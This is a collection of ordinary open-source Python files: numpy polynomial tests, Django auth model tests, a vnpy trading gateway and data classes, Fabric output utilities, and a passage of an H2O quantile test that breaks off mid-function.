def test_linspace(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
p = Poly([1, 2, 3], domain=d, window=w)
# check default domain
xtgt = np.linspace(d[0], d[1], 20)
ytgt = p(xtgt)
xres, yres = p.linspace(20)
assert_almost_equal(xres, xtgt)
assert_almost_equal(yres, ytgt)
# check specified domain
xtgt = np.linspace(0, 2, 20)
ytgt = p(xtgt)
xres, yres = p.linspace(20, domain=[0, 2])
assert_almost_equal(xres, xtgt)
assert_almost_equal(yres, ytgt)
def test_pow(Poly):
d = Poly.domain + random((2,))*.25
w = Poly.window + random((2,))*.25
tgt = Poly([1], domain=d, window=w)
tst = Poly([1, 2, 3], domain=d, window=w)
for i in range(5):
assert_poly_almost_equal(tst**i, tgt)
tgt = tgt * tst
# default domain and window
tgt = Poly([1])
tst = Poly([1, 2, 3])
for i in range(5):
assert_poly_almost_equal(tst**i, tgt)
tgt = tgt * tst
# check error for invalid powers
assert_raises(ValueError, op.pow, tgt, 1.5)
assert_raises(ValueError, op.pow, tgt, -1)
def test_call(Poly):
P = Polynomial
d = Poly.domain
x = np.linspace(d[0], d[1], 11)
# Check defaults
p = Poly.cast(P([1, 2, 3]))
tgt = 1 + x*(2 + 3*x)
res = p(x)
assert_almost_equal(res, tgt)
def test_cutdeg(Poly):
p = Poly([1, 2, 3])
assert_raises(ValueError, p.cutdeg, .5)
assert_raises(ValueError, p.cutdeg, -1)
assert_equal(len(p.cutdeg(3)), 3)
assert_equal(len(p.cutdeg(2)), 3)
assert_equal(len(p.cutdeg(1)), 2)
assert_equal(len(p.cutdeg(0)), 1)
def test_truncate(Poly):
p = Poly([1, 2, 3])
assert_raises(ValueError, p.truncate, .5)
assert_raises(ValueError, p.truncate, 0)
assert_equal(len(p.truncate(4)), 3)
assert_equal(len(p.truncate(3)), 3)
assert_equal(len(p.truncate(2)), 2)
assert_equal(len(p.truncate(1)), 1)
def test_trim(Poly):
c = [1, 1e-6, 1e-12, 0]
p = Poly(c)
assert_equal(p.trim().coef, c[:3])
assert_equal(p.trim(1e-10).coef, c[:2])
assert_equal(p.trim(1e-5).coef, c[:1])
def test_mapparms(Poly):
# check with defaults. Should be identity.
d = Poly.domain
w = Poly.window
p = Poly([1], domain=d, window=w)
assert_almost_equal([0, 1], p.mapparms())
#
w = 2*d + 1
p = Poly([1], domain=d, window=w)
assert_almost_equal([1, 2], p.mapparms())
def test_ufunc_override(Poly):
p = Poly([1, 2, 3])
x = np.ones(3)
assert_raises(TypeError, np.add, p, x)
assert_raises(TypeError, np.add, x, p)
#
# Test class method that only exists for some classes
#
class TestInterpolate:
def f(self, x):
return x * (x - 1) * (x - 2)
def test_raises(self):
assert_raises(ValueError, Chebyshev.interpolate, self.f, -1)
assert_raises(TypeError, Chebyshev.interpolate, self.f, 10.)
def test_dimensions(self):
for deg in range(1, 5):
assert_(Chebyshev.interpolate(self.f, deg).degree() == deg)
def test_approximation(self):
def powx(x, p):
return x**p
x = np.linspace(0, 2, 10)
for deg in range(0, 10):
for t in range(0, deg + 1):
p = Chebyshev.interpolate(powx, deg, domain=[0, 2], args=(t,))
assert_almost_equal(p(x), powx(x, t), decimal=11)
| anntzer/numpy | numpy/polynomial/tests/test_classes.py | Python | bsd-3-clause | 18,331 |
from django.conf.global_settings import PASSWORD_HASHERS
from django.contrib.auth import get_user_model
from django.contrib.auth.hashers import get_hasher
from django.contrib.auth.models import (
AbstractUser, Group, Permission, User, UserManager,
)
from django.contrib.contenttypes.models import ContentType
from django.core import mail
from django.db.models.signals import post_save
from django.test import TestCase, mock, override_settings
class NaturalKeysTestCase(TestCase):
def test_user_natural_key(self):
staff_user = User.objects.create_user(username='staff')
self.assertEqual(User.objects.get_by_natural_key('staff'), staff_user)
self.assertEqual(staff_user.natural_key(), ('staff',))
def test_group_natural_key(self):
users_group = Group.objects.create(name='users')
self.assertEqual(Group.objects.get_by_natural_key('users'), users_group)
class LoadDataWithoutNaturalKeysTestCase(TestCase):
fixtures = ['regular.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
class LoadDataWithNaturalKeysTestCase(TestCase):
fixtures = ['natural.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
class LoadDataWithNaturalKeysAndMultipleDatabasesTestCase(TestCase):
multi_db = True
def test_load_data_with_user_permissions(self):
# Create test contenttypes for both databases
default_objects = [
ContentType.objects.db_manager('default').create(
model='examplemodela',
app_label='app_a',
),
ContentType.objects.db_manager('default').create(
model='examplemodelb',
app_label='app_b',
),
]
other_objects = [
ContentType.objects.db_manager('other').create(
model='examplemodelb',
app_label='app_b',
),
ContentType.objects.db_manager('other').create(
model='examplemodela',
app_label='app_a',
),
]
# Now we create the test UserPermission
Permission.objects.db_manager("default").create(
name="Can delete example model b",
codename="delete_examplemodelb",
content_type=default_objects[1],
)
Permission.objects.db_manager("other").create(
name="Can delete example model b",
codename="delete_examplemodelb",
content_type=other_objects[0],
)
perm_default = Permission.objects.get_by_natural_key(
'delete_examplemodelb',
'app_b',
'examplemodelb',
)
perm_other = Permission.objects.db_manager('other').get_by_natural_key(
'delete_examplemodelb',
'app_b',
'examplemodelb',
)
self.assertEqual(perm_default.content_type_id, default_objects[1].id)
self.assertEqual(perm_other.content_type_id, other_objects[0].id)
class UserManagerTestCase(TestCase):
def test_create_user(self):
email_lowercase = '[email protected]'
user = User.objects.create_user('user', email_lowercase)
self.assertEqual(user.email, email_lowercase)
self.assertEqual(user.username, 'user')
self.assertFalse(user.has_usable_password())
def test_create_user_email_domain_normalize_rfc3696(self):
# According to http://tools.ietf.org/html/rfc3696#section-3
# the "@" symbol can be part of the local part of an email address
returned = UserManager.normalize_email(r'Abc\@[email protected]')
self.assertEqual(returned, r'Abc\@[email protected]')
def test_create_user_email_domain_normalize(self):
returned = UserManager.normalize_email('[email protected]')
self.assertEqual(returned, '[email protected]')
def test_create_user_email_domain_normalize_with_whitespace(self):
returned = UserManager.normalize_email('email\ [email protected]')
self.assertEqual(returned, 'email\ [email protected]')
def test_empty_username(self):
with self.assertRaisesMessage(ValueError, 'The given username must be set'):
User.objects.create_user(username='')
def test_create_user_is_staff(self):
email = '[email protected]'
user = User.objects.create_user('user', email, is_staff=True)
self.assertEqual(user.email, email)
self.assertEqual(user.username, 'user')
self.assertTrue(user.is_staff)
def test_create_super_user_raises_error_on_false_is_superuser(self):
with self.assertRaisesMessage(ValueError, 'Superuser must have is_superuser=True.'):
User.objects.create_superuser(
username='test', email='[email protected]',
password='test', is_superuser=False,
)
def test_create_superuser_raises_error_on_false_is_staff(self):
with self.assertRaisesMessage(ValueError, 'Superuser must have is_staff=True.'):
User.objects.create_superuser(
username='test', email='[email protected]',
password='test', is_staff=False,
)
class AbstractUserTestCase(TestCase):
def test_email_user(self):
# valid send_mail parameters
kwargs = {
"fail_silently": False,
"auth_user": None,
"auth_password": None,
"connection": None,
"html_message": None,
}
abstract_user = AbstractUser(email='[email protected]')
abstract_user.email_user(subject="Subject here",
message="This is a message", from_email="[email protected]", **kwargs)
# Test that one message has been sent.
self.assertEqual(len(mail.outbox), 1)
# Verify that test email contains the correct attributes:
message = mail.outbox[0]
self.assertEqual(message.subject, "Subject here")
self.assertEqual(message.body, "This is a message")
self.assertEqual(message.from_email, "[email protected]")
self.assertEqual(message.to, [abstract_user.email])
def test_last_login_default(self):
user1 = User.objects.create(username='user1')
self.assertIsNone(user1.last_login)
user2 = User.objects.create_user(username='user2')
self.assertIsNone(user2.last_login)
def test_user_double_save(self):
"""
Calling user.save() twice should trigger password_changed() once.
"""
user = User.objects.create_user(username='user', password='foo')
user.set_password('bar')
with mock.patch('django.contrib.auth.password_validation.password_changed') as pw_changed:
user.save()
self.assertEqual(pw_changed.call_count, 1)
user.save()
self.assertEqual(pw_changed.call_count, 1)
@override_settings(PASSWORD_HASHERS=PASSWORD_HASHERS)
def test_check_password_upgrade(self):
"""
password_changed() shouldn't be called if User.check_password()
triggers a hash iteration upgrade.
"""
user = User.objects.create_user(username='user', password='foo')
initial_password = user.password
self.assertTrue(user.check_password('foo'))
hasher = get_hasher('default')
self.assertEqual('pbkdf2_sha256', hasher.algorithm)
old_iterations = hasher.iterations
try:
# Upgrade the password iterations
hasher.iterations = old_iterations + 1
with mock.patch('django.contrib.auth.password_validation.password_changed') as pw_changed:
user.check_password('foo')
self.assertEqual(pw_changed.call_count, 0)
self.assertNotEqual(initial_password, user.password)
finally:
hasher.iterations = old_iterations
class IsActiveTestCase(TestCase):
"""
Tests the behavior of the guaranteed is_active attribute
"""
def test_builtin_user_isactive(self):
user = User.objects.create(username='foo', email='[email protected]')
# is_active is true by default
self.assertEqual(user.is_active, True)
user.is_active = False
user.save()
user_fetched = User.objects.get(pk=user.pk)
# the is_active flag is saved
self.assertFalse(user_fetched.is_active)
@override_settings(AUTH_USER_MODEL='auth_tests.IsActiveTestUser1')
def test_is_active_field_default(self):
"""
tests that the default value for is_active is provided
"""
UserModel = get_user_model()
user = UserModel(username='foo')
self.assertEqual(user.is_active, True)
# you can set the attribute - but it will not save
user.is_active = False
# there should be no problem saving - but the attribute is not saved
user.save()
user_fetched = UserModel._default_manager.get(pk=user.pk)
# the attribute is always true for newly retrieved instance
self.assertEqual(user_fetched.is_active, True)
class TestCreateSuperUserSignals(TestCase):
"""
Simple test case for ticket #20541
"""
def post_save_listener(self, *args, **kwargs):
self.signals_count += 1
def setUp(self):
self.signals_count = 0
post_save.connect(self.post_save_listener, sender=User)
def tearDown(self):
post_save.disconnect(self.post_save_listener, sender=User)
def test_create_user(self):
User.objects.create_user("JohnDoe")
self.assertEqual(self.signals_count, 1)
def test_create_superuser(self):
User.objects.create_superuser("JohnDoe", "[email protected]", "1")
self.assertEqual(self.signals_count, 1)
| vincepandolfo/django | tests/auth_tests/test_models.py | Python | bsd-3-clause | 10,053 |
# encoding: UTF-8
from eventEngine import *
# Default empty values
EMPTY_STRING = ''
EMPTY_UNICODE = u''
EMPTY_INT = 0
EMPTY_FLOAT = 0.0
# Direction constants (values are kept in Chinese: they are runtime identifiers)
DIRECTION_NONE = u'无方向'       # no direction
DIRECTION_LONG = u'多'           # long
DIRECTION_SHORT = u'空'          # short
DIRECTION_UNKNOWN = u'未知'      # unknown
DIRECTION_NET = u'净'            # net
# Offset (open/close) constants
OFFSET_NONE = u'无开平'          # no offset
OFFSET_OPEN = u'开仓'            # open position
OFFSET_CLOSE = u'平仓'           # close position
OFFSET_UNKNOWN = u'未知'         # unknown
# Order status constants
STATUS_NOTTRADED = u'未成交'     # not filled
STATUS_PARTTRADED = u'部分成交'  # partially filled
STATUS_ALLTRADED = u'全部成交'   # fully filled
STATUS_CANCELLED = u'已撤销'     # cancelled
STATUS_UNKNOWN = u'未知'         # unknown
# Product type constants
PRODUCT_EQUITY = u'股票'         # equity
PRODUCT_FUTURES = u'期货'        # futures
PRODUCT_OPTION = u'期权'         # option
PRODUCT_INDEX = u'指数'          # index
PRODUCT_COMBINATION = u'组合'    # combination
# Option type constants
OPTION_CALL = u'看涨期权'        # call option
OPTION_PUT = u'看跌期权'         # put option
########################################################################
class VtGateway(object):
    """Trading gateway interface."""
    #----------------------------------------------------------------------
    def __init__(self, eventEngine):
        """Constructor"""
        self.eventEngine = eventEngine
    #----------------------------------------------------------------------
    def onTick(self, tick):
        """Market tick push."""
        # General event
        event1 = Event(type_=EVENT_TICK)
        event1.dict_['data'] = tick
        self.eventEngine.put(event1)
        # Event keyed to this contract symbol
        event2 = Event(type_=EVENT_TICK+tick.vtSymbol)
        event2.dict_['data'] = tick
        self.eventEngine.put(event2)
    #----------------------------------------------------------------------
    def onTrade(self, trade):
        """Trade (fill) push."""
        # The trade ID is usually only known after the fact, so only the
        # general event needs to be pushed.
        event1 = Event(type_=EVENT_TRADE)
        event1.dict_['data'] = trade
        self.eventEngine.put(event1)
    #----------------------------------------------------------------------
    def onOrder(self, order):
        """Order update push."""
        # General event
        event1 = Event(type_=EVENT_ORDER)
        event1.dict_['data'] = order
        self.eventEngine.put(event1)
        # Event keyed to this order ID
        event2 = Event(type_=EVENT_ORDER+order.vtOrderID)
        event2.dict_['data'] = order
        self.eventEngine.put(event2)
    #----------------------------------------------------------------------
    def onPosition(self, position):
        """Position push."""
        # General event
        event1 = Event(type_=EVENT_POSITION)
        event1.dict_['data'] = position
        self.eventEngine.put(event1)
        # Event keyed to this position name
        event2 = Event(type_=EVENT_POSITION+position.vtPositionName)
        event2.dict_['data'] = position
        self.eventEngine.put(event2)
    #----------------------------------------------------------------------
    def onAccount(self, account):
        """Account push."""
        # General event
        event1 = Event(type_=EVENT_ACCOUNT)
        event1.dict_['data'] = account
        self.eventEngine.put(event1)
        # Event keyed to this account ID
        event2 = Event(type_=EVENT_ACCOUNT+account.vtAccountID)
        event2.dict_['data'] = account
        self.eventEngine.put(event2)
    #----------------------------------------------------------------------
    def onError(self, error):
        """Error push."""
        # General event
        event1 = Event(type_=EVENT_ERROR)
        event1.dict_['data'] = error
        self.eventEngine.put(event1)
    #----------------------------------------------------------------------
    def onLog(self, log):
        """Log push."""
        # General event
        event1 = Event(type_=EVENT_LOG)
        event1.dict_['data'] = log
        self.eventEngine.put(event1)
    #----------------------------------------------------------------------
    def onContract(self, contract):
        """Contract metadata push."""
        # General event
        event1 = Event(type_=EVENT_CONTRACT)
        event1.dict_['data'] = contract
        self.eventEngine.put(event1)
    #----------------------------------------------------------------------
    def connect(self):
        """Connect."""
        pass
    #----------------------------------------------------------------------
    def subscribe(self):
        """Subscribe to market data."""
        pass
    #----------------------------------------------------------------------
    def sendOrder(self):
        """Send an order."""
        pass
    #----------------------------------------------------------------------
    def cancelOrder(self):
        """Cancel an order."""
        pass
    #----------------------------------------------------------------------
    def close(self):
        """Close the connection."""
        pass
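# Illustrative sketch (not part of the original module): a gateway pushes data
# to the rest of the system through the event engine. Assumes EventEngine and
# the EVENT_* constants come from the eventEngine module imported above.
#
#     ee = EventEngine()
#     gateway = VtGateway(ee)
#     tick = VtTickData()                  # defined later in this module
#     tick.symbol = 'IF1506'               # hypothetical contract
#     tick.vtSymbol = 'DEMO.IF1506'        # hypothetical GatewayName.symbol
#     tick.lastPrice = 3456.8
#     gateway.onTick(tick)                 # emits EVENT_TICK and EVENT_TICK+vtSymbol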
########################################################################
class VtBaseData(object):
"""回调函数推送数据的基础类,其他数据类继承于此"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.gatewayName = EMPTY_STRING # Gateway名称
self.rawData = None # 原始数据
########################################################################
class VtTickData(VtBaseData):
"""Tick行情数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtTickData, self).__init__()
# 代码相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
# 成交数据
self.lastPrice = EMPTY_FLOAT # 最新成交价
self.volume = EMPTY_INT # 最新成交量
self.openInterest = EMPTY_INT # 持仓量
self.tickTime = EMPTY_STRING # 更新时间
# 五档行情
self.bidPrice1 = EMPTY_FLOAT
self.bidPrice2 = EMPTY_FLOAT
self.bidPrice3 = EMPTY_FLOAT
self.bidPrice4 = EMPTY_FLOAT
self.bidPrice5 = EMPTY_FLOAT
self.askPrice1 = EMPTY_FLOAT
self.askPrice2 = EMPTY_FLOAT
self.askPrice3 = EMPTY_FLOAT
self.askPrice4 = EMPTY_FLOAT
self.askPrice5 = EMPTY_FLOAT
self.bidVolume1 = EMPTY_INT
self.bidVolume2 = EMPTY_INT
self.bidVolume3 = EMPTY_INT
self.bidVolume4 = EMPTY_INT
self.bidVolume5 = EMPTY_INT
self.askVolume1 = EMPTY_INT
self.askVolume2 = EMPTY_INT
self.askVolume3 = EMPTY_INT
self.askVolume4 = EMPTY_INT
self.askVolume5 = EMPTY_INT
########################################################################
class VtTradeData(VtBaseData):
"""成交数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtTradeData, self).__init__()
# 代码编号相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
self.tradeID = EMPTY_STRING # 成交编号
self.vtTradeID = EMPTY_STRING # 成交在vt系统中的唯一编号,通常是 Gateway名.成交编号
self.orderID = EMPTY_STRING # 订单编号
self.vtOrderID = EMPTY_STRING # 订单在vt系统中的唯一编号,通常是 Gateway名.订单编号
# 成交相关
self.direction = EMPTY_UNICODE # 成交方向
self.offset = EMPTY_UNICODE # 成交开平仓
self.price = EMPTY_FLOAT # 成交价格
self.volume = EMPTY_INT # 成交数量
self.tradeTime = EMPTY_STRING # 成交时间
########################################################################
class VtOrderData(VtBaseData):
"""订单数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtOrderData, self).__init__()
# 代码编号相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
self.orderID = EMPTY_STRING # 订单编号
self.vtOrderID = EMPTY_STRING # 订单在vt系统中的唯一编号,通常是 Gateway名.订单编号
# 报单相关
self.direction = EMPTY_UNICODE # 报单方向
self.offset = EMPTY_UNICODE # 报单开平仓
self.price = EMPTY_FLOAT # 报单价格
self.totalVolume = EMPTY_INT # 报单总数量
self.tradedVolume = EMPTY_INT # 报单成交数量
self.status = EMPTY_UNICODE # 报单状态
self.orderTime = EMPTY_STRING # 发单时间
self.cancelTime = EMPTY_STRING # 撤单时间
# CTP/LTS相关
self.frontID = EMPTY_INT # 前置机编号
self.sessionID = EMPTY_INT # 连接编号
########################################################################
class VtPositionData(VtBaseData):
"""持仓数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtPositionData, self).__init__()
# 代码编号相关
self.symbol = EMPTY_STRING # 合约代码
self.vtSymbol = EMPTY_STRING # 合约在vt系统中的唯一代码,通常是 Gateway名.合约代码
# 持仓相关
self.direction = EMPTY_STRING # 持仓方向
self.position = EMPTY_INT # 持仓量
self.frozen = EMPTY_INT # 冻结数量
self.price = EMPTY_FLOAT # 持仓均价
self.vtPositionName = EMPTY_STRING # 持仓在vt系统中的唯一代码,通常是vtSymbol.方向
########################################################################
class VtAccountData(VtBaseData):
"""账户数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtAccountData, self).__init__()
# 账号代码相关
self.accountID = EMPTY_STRING # 账户代码
self.vtAccountID = EMPTY_STRING # 账户在vt中的唯一代码,通常是 Gateway名.账户代码
# 数值相关
self.preBalance = EMPTY_FLOAT # 昨日账户结算净值
self.balance = EMPTY_FLOAT # 账户净值
self.available = EMPTY_FLOAT # 可用资金
self.commission = EMPTY_FLOAT # 今日手续费
self.margin = EMPTY_FLOAT # 保证金占用
self.closeProfit = EMPTY_FLOAT # 平仓盈亏
self.positionProfit = EMPTY_FLOAT # 持仓盈亏
########################################################################
class VtErrorData(VtBaseData):
"""错误数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtErrorData, self).__init__()
self.errorID = EMPTY_STRING # 错误代码
self.errorMsg = EMPTY_UNICODE # 错误信息
########################################################################
class VtLogData(VtBaseData):
"""日志数据类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtLogData, self).__init__()
self.logContent = EMPTY_UNICODE # 日志信息
########################################################################
class VtContractData(VtBaseData):
"""合约详细信息类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(VtBaseData, self).__init__()
self.symbol = EMPTY_STRING
self.vtSymbol = EMPTY_STRING
self.productClass = EMPTY_STRING
self.size = EMPTY_INT
self.priceTick = EMPTY_FLOAT
# 期权相关
self.strikePrice = EMPTY_FLOAT
self.underlyingSymbol = EMPTY_STRING
self.optionType = EMPTY_UNICODE
########################################################################
class VtSubscribeReq:
"""订阅行情时传入的对象类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.symbol = EMPTY_STRING
self.exchange = EMPTY_STRING
########################################################################
class VtOrderReq:
"""发单时传入的对象类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.symbol = EMPTY_STRING
########################################################################
class VtCancelOrderReq:
"""撤单时传入的对象类"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.symbol = EMPTY_STRING
self.exchange = EMPTY_STRING
        self.orderID = EMPTY_STRING    # order ID (field name assumed; the source line was truncated at "self.")
| drongh/vnpy | vn.trader/gateway.py | Python | mit | 14,192 |
"""
Internal subroutines for e.g. aborting execution with an error message,
or performing indenting on multiline output.
"""
import sys
import textwrap
def abort(msg):
"""
    Abort execution, print ``msg`` to stderr and exit with error status (1).
This function currently makes use of `sys.exit`_, which raises
`SystemExit`_. Therefore, it's possible to detect and recover from inner
calls to `abort` by using ``except SystemExit`` or similar.
.. _sys.exit: http://docs.python.org/library/sys.html#sys.exit
.. _SystemExit: http://docs.python.org/library/exceptions.html#exceptions.SystemExit
"""
from fabric.state import output
if output.aborts:
print >> sys.stderr, "\nFatal error: " + str(msg)
print >> sys.stderr, "\nAborting."
sys.exit(1)
def warn(msg):
"""
Print warning message, but do not abort execution.
This function honors Fabric's :doc:`output controls
<../../usage/output_controls>` and will print the given ``msg`` to stderr,
provided that the ``warnings`` output level (which is active by default) is
turned on.
"""
from fabric.state import output
if output.warnings:
print >> sys.stderr, "\nWarning: %s\n" % msg
def indent(text, spaces=4, strip=False):
"""
Return ``text`` indented by the given number of spaces.
If text is not a string, it is assumed to be a list of lines and will be
joined by ``\\n`` prior to indenting.
When ``strip`` is ``True``, a minimum amount of whitespace is removed from
the left-hand side of the given string (so that relative indents are
preserved, but otherwise things are left-stripped). This allows you to
effectively "normalize" any previous indentation for some inputs.
"""
# Normalize list of strings into a string for dedenting. "list" here means
# "not a string" meaning "doesn't have splitlines". Meh.
if not hasattr(text, 'splitlines'):
text = '\n'.join(text)
# Dedent if requested
if strip:
text = textwrap.dedent(text)
prefix = ' ' * spaces
output = '\n'.join(prefix + line for line in text.splitlines())
    # Strip out empty lines before/after
output = output.strip()
# Reintroduce first indent (which just got stripped out)
output = prefix + output
return output
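# Illustrative usage sketch (not part of the original module):
#
#     >>> print(indent(["line one", "  line two"], spaces=2))
#       line one
#         line two
#
# With strip=True, textwrap.dedent() first removes any common leading
# whitespace, so relative indents survive while absolute ones are normalized.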
def puts(text, show_prefix=True, end="\n", flush=False):
"""
An alias for ``print`` whose output is managed by Fabric's output controls.
In other words, this function simply prints to ``sys.stdout``, but will
hide its output if the ``user`` :doc:`output level
</usage/output_controls>` is set to ``False``.
If ``show_prefix=False``, `puts` will omit the leading ``[hostname]``
which it tacks on by default. (It will also omit this prefix if
``env.host_string`` is empty.)
Newlines may be disabled by setting ``end`` to the empty string (``''``).
(This intentionally mirrors Python 3's ``print`` syntax.)
You may force output flushing (e.g. to bypass output buffering) by setting
``flush=True``.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.fastprint`
"""
from fabric.state import output, env
if output.user:
prefix = ""
if env.host_string and show_prefix:
prefix = "[%s] " % env.host_string
sys.stdout.write(prefix + str(text) + end)
if flush:
sys.stdout.flush()
def fastprint(text, show_prefix=False, end="", flush=True):
"""
Print ``text`` immediately, without any prefix or line ending.
This function is simply an alias of `~fabric.utils.puts` with different
default argument values, such that the ``text`` is printed without any
embellishment and immediately flushed.
It is useful for any situation where you wish to print text which might
otherwise get buffered by Python's output buffering (such as within a
processor intensive ``for`` loop). Since such use cases typically also
require a lack of line endings (such as printing a series of dots to
signify progress) it also omits the traditional newline by default.
.. note::
Since `~fabric.utils.fastprint` calls `~fabric.utils.puts`, it is
likewise subject to the ``user`` :doc:`output level
</usage/output_controls>`.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.puts`
"""
return puts(text=text, show_prefix=show_prefix, end=end, flush=flush)
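# Illustrative usage sketch (not part of the original module): fastprint suits
# progress output inside tight loops because it omits the line ending and
# flushes immediately; puts() gives the usual prefixed, line-oriented output.
#
#     for item in work_items:              # hypothetical iterable
#         fastprint(".")
#     puts("done")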
def handle_prompt_abort():
import fabric.state
if fabric.state.env.abort_on_prompts:
abort("Needed to prompt, but abort-on-prompts was set to True!")
| apavlo/h-store | third_party/python/fabric/utils.py | Python | gpl-3.0 | 4,636 |
import unittest, time, sys, random, math, getpass
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_import as h2i, h2o_util, h2o_browse as h2b, h2o_print as h2p
import h2o_summ
DO_TRY_SCIPY = False
if getpass.getuser()=='kevin' or getpass.getuser()=='jenkins':
DO_TRY_SCIPY = True
DO_MEDIAN = True
# FIX!. we seem to lose accuracy with fewer bins -> more iterations. Maybe we're leaking or ??
# this test failed (if run as user kevin) with 10 bins
MAX_QBINS = 1000 # pass
MAX_QBINS = 1000 # pass
# this one doesn't fail with 10 bins
# this failed. interestingly got same number as 1000 bin summary2 (the 7.433..
# on runifA.csv (2nd col?)
# MAX_QBINS = 20
# Exception: h2o quantile multipass is not approx. same as sort algo. h2o_util.assertApproxEqual failed comparing 7.43337413296 and 8.26268245. {'tol': 2e-07}.
MAX_QBINS = 27
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init()
@classmethod
def tearDownClass(cls):
# h2o.sleep(3600)
h2o.tear_down_cloud()
def test_summary2_unifiles(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
# new with 1000 bins. copy expected from R
tryList = [
('cars.csv', 'c.hex', [
(None, None,None,None,None,None),
('economy (mpg)', None,None,None,None,None),
('cylinders', None,None,None,None,None),
],
),
('runifA.csv', 'A.hex', [
(None, 1.00, 25.00, 50.00, 75.00, 100.0),
('x', -99.9, -44.7, 8.26, 58.00, 91.7),
],
),
# colname, (min, 25th, 50th, 75th, max)
('runif.csv', 'x.hex', [
(None, 1.00, 5000.0, 10000.0, 15000.0, 20000.00),
('D', -5000.00, -3735.0, -2443, -1187.0, 99.8),
('E', -100000.0, -49208.0, 1783.8, 50621.9, 100000.0),
('F', -1.00, -0.4886, 0.00868, 0.5048, 1.00),
],
),
('runifB.csv', 'B.hex', [
(None, 1.00, 2501.00, 5001.00, 7501.00, 10000.00),
                ('x', -100.00, -50.1, 0.974, 51.7, 100.00),
],
),
('runifC.csv', 'C.hex', [
(None, 1.00, 25002.00, 50002.00, 75002.00, 100000.00),
('x', -100.00, -50.45, -1.135, 49.28, 100.00),
],
),
]
timeoutSecs = 15
trial = 1
n = h2o.nodes[0]
lenNodes = len(h2o.nodes)
timeoutSecs = 60
for (csvFilename, hex_key, expectedCols) in tryList:
csvPathname = csvFilename
csvPathnameFull = h2i.find_folder_and_filename('smalldata', csvPathname, returnFullPath=True)
parseResult = h2i.import_parse(bucket='smalldata', path=csvPathname,
schema='put', hex_key=hex_key, timeoutSecs=10, doSummary=False)
print "Parse result['destination_key']:", parseResult['destination_key']
# We should be able to see the parse result?
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvFilename
numRows = inspect["numRows"]
numCols = inspect["numCols"]
# okay to get more cols than we want
# okay to vary MAX_QBINS because we adjust the expected accuracy
summaryResult = h2o_cmd.runSummary(key=hex_key, max_qbins=MAX_QBINS)
h2o.verboseprint("summaryResult:", h2o.dump_json(summaryResult))
summaries = summaryResult['summaries']
scipyCol = 0
for expected, column in zip(expectedCols, summaries):
colname = column['colname']
if expected[0]:
                    self.assertEqual(colname, expected[0])
else:
# if the colname is None, skip it (so we don't barf on strings on the h2o quantile page
scipyCol += 1
continue
quantile = 0.5 if DO_MEDIAN else .999
# h2o has problem if a list of columns (or dictionary) is passed to 'column' param
q = h2o.nodes[0].quantiles(source_key=hex_key, column=column['colname'],
quantile=quantile, max_qbins=MAX_QBINS, multiple_pass=2, interpolation_type=7) # for comparing to summary2
qresult = q['result']
qresult_single = q['result_single']
h2p.blue_print("h2o quantiles result:", qresult)
h2p.blue_print("h2o quantiles result_single:", qresult_single)
h2p.blue_print("h2o quantiles iterations:", q['iterations'])
h2p.blue_print("h2o quantiles interpolated:", q['interpolated'])
print h2o.dump_json(q)
# ('', '1.00', '25002.00', '50002.00', '75002.00', '100000.00'),
coltype = column['type']
nacnt = column['nacnt']
stats = column['stats']
stattype= stats['type']
print stattype
# FIX! we should compare mean and sd to expected?
# enums don't have mean or sd?
if stattype!='Enum':
mean = stats['mean']
sd = stats['sd']
zeros = stats['zeros']
mins = stats['mins']
maxs = stats['maxs']
print "colname:", colname, "mean (2 places):", h2o_util.twoDecimals(mean)
print "colname:", colname, "std dev. (2 places):", h2o_util.twoDecimals(sd)
pct = stats['pct']
print "pct:", pct
print ""
# the thresholds h2o used, should match what we expected
expectedPct= [0.01, 0.05, 0.1, 0.25, 0.33, 0.5, 0.66, 0.75, 0.9, 0.95, 0.99]
pctile = stats['pctile']
# figure out the expected max error
# use this for comparing to sklearn/sort
if expected[1] and expected[5]:
expectedRange = expected[5] - expected[1]
                    # because of floor and ceil effects we potentially lose 2 bins (worst case)
                    # the extra bin for the max value is an extra bin...ignore it
expectedBin = expectedRange/(MAX_QBINS-2)
maxErr = 0.5 * expectedBin # should we have some fuzz for fp?
else:
print "Test won't calculate max expected error"
maxErr = 0
# hack..assume just one None is enough to ignore for cars.csv
if expected[1]:
h2o_util.assertApproxEqual(mins[0], expected[1], tol=maxErr, msg='min is not approx. expected')
if expected[2]:
h2o_util.assertApproxEqual(pctile[3], expected[2], tol=maxErr, msg='25th percentile is not approx. expected')
if expected[3]:
